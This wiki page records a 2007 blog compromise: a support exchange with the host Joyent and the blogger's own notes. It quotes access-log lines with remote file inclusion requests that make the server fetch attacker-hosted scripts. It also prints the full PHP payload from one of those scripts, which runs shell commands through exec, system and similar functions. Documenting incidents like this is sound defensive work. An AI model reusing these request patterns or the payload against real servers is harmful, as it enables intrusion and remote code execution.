• If you are citizen of an European Union member nation, you may not use this service unless you are at least 16 years old.

  • Finally, you can manage your Google Docs, uploads, and email attachments (plus Dropbox and Slack files) in one convenient place. Claim a free account, and in less than 2 minutes, Dokkio (from the makers of PBworks) can automatically organize your content for you.

View
 

Joyent20071107

Page history last edited by Chris Messina 13 years, 6 months ago

Sent 20071107 via customer.joyent.com


 

I'm afraid that my account has been compromised. I don't know how or what happened (or how to figure it out) but if you could look into it, that'd be great.

 

Anyway, I logged into my /blog account today on NELSON and saw two directories that I didn't recognize:

 

blog/rh4m4.t35.com

blog/www.kolortavil.org

 

These both seem to direct to spam sites, so I presume that they've gained access to my account, though I don't know how.

 

Can you check the logs and let me know what you find? Thanks,

 

Chris


 

Response from Kristie Wells at Nov 7, 2007 7:44 PM:

 

Chris,

 

I meant to include this piece in your support ticket.


88.191.39.142 - - [07/Nov/2007:17:43:07 +0000] "GET /drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 404 205 "-" "libwww-perl/5.79"
88.191.39.142 - - [07/Nov/2007:17:43:02 +0000] "GET /blog/category/what-i-do/drupal/page/5/drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 503 323 "-" "libwww-perl/5.79"
88.191.39.142 - - [07/Nov/2007:17:43:07 +0000] "GET /blog/category/what-i-do/drupal/page/drupal/?_menu[callbacks][1][callback]=http://www.kolortavil.org/Connections/ok.txt? HTTP/1.1" 200 13257 "-" "libwww-perl/5.79"

The breach appears to be from a dedicated IP in france for a probably known script kiddie so we are blocking that IP from all the shared servers.

 

Cheers,

Kristie


 

My reply at Nov 7, 2007 7:51 PM:

 

Cool. It turns out that it was the wp-super-cache plugin [1]. I've

seen about 4-5 other reports of the same problem:

 

http://twitter.com/stefsull/statuses/396379352

http://twitter.com/tiffanybbrown/statuses/396344922

http://twitter.com/tiffanybbrown/statuses/396362442

http://tiffanybbrown.com/2007/11/07/damn-my-vps-is-being-cracked/

 

;)

 

Thanks for the follow up.

 

Chris

 

[1] http://wordpress.org/support/topic/142480?replies=2


 

Notes

 

Here is the script that was at the end of ok.txt:

 


<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

 

Further reviewing my logs I found:

 


194.108.193.138 - - [07/Nov/2007:22:27:24 +0000] "GET /blog/2007/07/18/wordpressmu-making-a-smart-platform-choice/start.php?var=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 412 302 "-" "libwww-perl/5.79"
194.108.193.138 - - [07/Nov/2007:22:27:24 +0000] "GET /start.php?var=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 412 243 "-" "libwww-perl/5.79"
67.15.54.5 - - [07/Nov/2007:23:19:19 +0000] "GET /blog/2007/07/10/my-default-wordpress-setup-17-must-have-plugins/wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 8333 "-" "libwww-perl/5.808"
67.15.54.5 - - [07/Nov/2007:23:19:19 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
67.15.54.5 - - [07/Nov/2007:23:19:20 +0000] "GET /blog/2007/07/10/wamp_dir/setup/yesno.phtml?no_url=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 8237 "-" "libwww-perl/5.808"
 
81.173.18.20 - - [08/Nov/2007:22:14:01 +0000] "GET /blog/2005/04/30/the-full-%3Cwbr%20/%3Edish-on-the-always-use-prot.../index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 412 312 "-" "libwww-perl/5.805"
81.173.18.20 - - [08/Nov/2007:22:14:02 +0000] "GET /index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 300 491 "-" "libwww-perl/5.805"
81.173.18.20 - - [08/Nov/2007:22:14:02 +0000] "GET /blog/2005/04/30/the-full-%3Cwbr%20/index.php?p=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 8386 "-" "libwww-perl/5.805"

222.239.78.91 - - [08/Nov/2007:23:54:55 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
222.239.78.91 - - [08/Nov/2007:23:54:55 +0000] "GET /blog/2007/07/10/wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 8651 "-" "libwww-perl/5.803"
222.239.78.91 - - [08/Nov/2007:23:54:49 +0000] "GET /blog/2007/07/10/my-default-wordpress-setup-17-must-have-plugins/wamp_dir/setup/yesno.phtml?no_url=http://www.medialed.com/ledlink/x? HTTP/1.1" 404 8747 "-" "libwww-perl/5.803"

Comments (0)

You don't have permission to comment on this page.